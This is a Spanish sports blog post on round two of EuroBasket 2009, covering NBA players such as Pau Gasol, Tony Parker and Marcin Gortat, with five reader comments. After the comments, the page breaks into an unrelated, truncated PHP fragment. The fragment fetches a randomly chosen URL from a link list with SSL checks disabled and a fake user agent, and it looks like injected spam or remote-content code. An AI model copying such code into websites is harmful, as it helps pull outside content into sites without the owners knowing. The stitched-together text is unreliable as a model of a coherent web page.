EuroNBAsket: Jornada 2

09 de September de 2009 por TheDeerHunter

Jornada vibrante la de ayer en el Europeo. Repasamos que tal lo hicieron los representantes NBA.

De entrada Pau Gasol sacó buena parte de las castañas del fuego a la selección española ante los británicos. Su actuación, portentosa con 27 puntos y 11 rebotes, podría haber sido todavía más portentosa afinando en los tiros libres… y esto sin mencionar los graves problemas defensivos que viene arrastrando él y sus compañeros. Peor es el caso de Marc, empecinado en forzar pases en situaciones en las que debería ejecutar él, máxime en un contexto como el de ayer, cuando los interiores rivales sufrían durante todo el encuentro graves problemas de acumulación de faltas. Rudy Fernandez volvió, visiblemente renqueante, pero fue capaz de aportar sus 13 puntitos decisivos para la victoria de forma muy eficaz. Si en la primera jornada nuestro amigo Pops se salió, ayer nos brindó todo un recital de mandarinas, cacaués y decisiones equivocadas. Tanto mejor para los de Scariolo que, milagrosamente siguen vivos.

En el otro encuentro del grupo de España, Nenad Krstic únicamente logró 2 puntos y 2 rebotes tras haber brillado la jornada anterior. Los eslovenos acribillaron a los Serbios de todas las maneras posibles. Uno de los más destacados fue el Sun Goran Dragic, con 16 puntos y un 5 de 5 en el lanzamiento de 2p. También recogió 4 rebotes y logró 2 robos de balón.

Francia también se mantiene imbatida con Tony Parker decisivo. 23 puntos, 4 rebotes, 3 asistencias, 2 robos y acaparando en los momentos decisivos. El resto de miembros NBA franceses estuvieron bastante grises dando vidilla a Letonia. Biedrins sigue reñido con el aro, pero al menos fue capaz de capturar 20 rebotes. En el otro choque del grupo Rusia se la pegó bien contra Alemania.

En números MVP también se mueve el sorprendente Marcin Gortat y su selección se sale. Ayer les pegaron un repaso a Lituania de muy señor mío… y los otrora favoritos se la juegan de verdad esta tarde contra Bulgaria. 15 puntos, 17 rebotes y 2 tapones para el polaco. En el otro partido del grupo sólo hizo falta media parte de Ilyasova para que los Turcos rompieran su partido contra los búlgaros. Impresionante paliza que se llevaron pero hoy se podrían clasificar y dar la campanada si se ponen tontos.

Por último, Grecia ganó a Croacia a pesar de los 15 puntos de Roko Ukic y Macedonia condenó a Israel con super-Massey en plan metralleta.

MVP: Gasol se salió sí… pero ante un juego interior pobrísimo y no termina de ofrecer buenas sensaciones. Se lo damos a Tony Parker que volvió a hacer un partidazo contra unos letones muy peleones (que conste que no buscaba hacer la rima)

La Sorpresa: El esloveno Goran Dragic, tras no anotar ni un sólo punto la pasada jornada, se destapó con un acierto espectacular en la paliza que les dieron a los siempre complicados serbios.

La Decepción: Después de su partidazo contra España va Nenad Krstic y nos ofrece una actuación tan lamentable como la de ayer.

El mayor esfuerzo en vano: Posiblemente el de Roko Lenni Ukic contra los griegos, que están que lo tiran.

Comenta

5 comentarios a esta entrada

  1. Txusma dice:
    #1

    Lituania ha perdido los 2 partidos, Rusia pierde contra una Alemania sin Dirk, Macedonia le gana a Israel… Un poco loco anda el EuroBasket. Si acabamos pasando a la segunda fase y Lituania queda fuera sera un escollo menos aunq no importara mucho si seguimos jugando así.
    Como decía Toni en el otro post, dominador Gortat. Yo no daba un duro por él pero se está comiendo con patatas a todo pivot q se pone por delante. ya pueden tomar notas los Gasol de su intensidad.

      Citar

  2. sergio dice:
    #2

    Esta España no es la mía que me la han quitao’.
    Empezando porque creo que tenemos una docena de jugadores algo inferiores a los que teniamos en Pekín (Berni, JImenez, Calderón), veo el principal problema en Scariolo y sus rotaciones constantes, falta de intensidad defensiva y carencia de determinadas jugadas (que se estan volviendo algo previsibles vaya). Que yo recuerde no he visto mas de 5 o 6 bloqueos indirectos cuando tiene un alero o escolta la pelota para crear recepciones y canastas faciles como nos hacía Serbia en la primera jornada. Marc no confía en si mismo (solo metiendo culo bajo el aro debería sacar petróleo), Ricky debería saber jugar en estático, los otros dos bases deberían intentar también el pick&roll,….. En fin, espero que los problemas tácticos de Scariolo se vayan a partir de hoy que empezamos a jugarnos cosas muy serias (clasificación al Mundial incluida) y que los problemas de los jugadores desaparezcan con un poco de confianza(que eso viene con cada victoria)
    Espero….

      Citar

  3. toni dice:
    #3

    Lo de Marc no lo acabo de entender, cuando estaba siendo el mejor en el preeuropeo, ha sido llegar su hermano y no parecer ni su sombra, no entiendo esta perdida de confianza, ¿tanto le impone tener la figura en la que se ha fijado como pareja?

    Hay un buen partido hoy entre Polonia y Turquia en el que se decidira el liderato de ese grupo.

    España se la juega hoy ante Lakovic y compañia, hay que perder el miedo a tirar y subir la intensidad, es la clave. Solamente que antes del partido se miren la camiseta y se den cuenta de la de gente que representan, un poco de amor propio.
    De las rotaciones ni vale la pena hablar.

    Hacia mucho tiempo que no veia a Pau meter un triple(suele meter uno por temporada o 2, ¿no?), curiosamente metió 2.

    ¡A ver si llegan las 18:15 ya!

      Citar

  4. Óscar dice:
    #4

    Ya pasado el mal trago (Butler) de la Gran Bretaña sin Gordon, Azubuike y Deng (!), hay que ser positivos. Los jugadores son los primeros que no saben qué sucede. Nos han acostumbrado a ofrecer un nivel tan alto, que nos han hecho olvidar que esto es baloncesto y los rivales juegan. Un buen partido, a soltarse y a intentar el oro tan ansiado. Son demasiado grandes para dudar de ellos.

      Citar

  5. Txusma dice:
    #5

    Argh!!!!

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>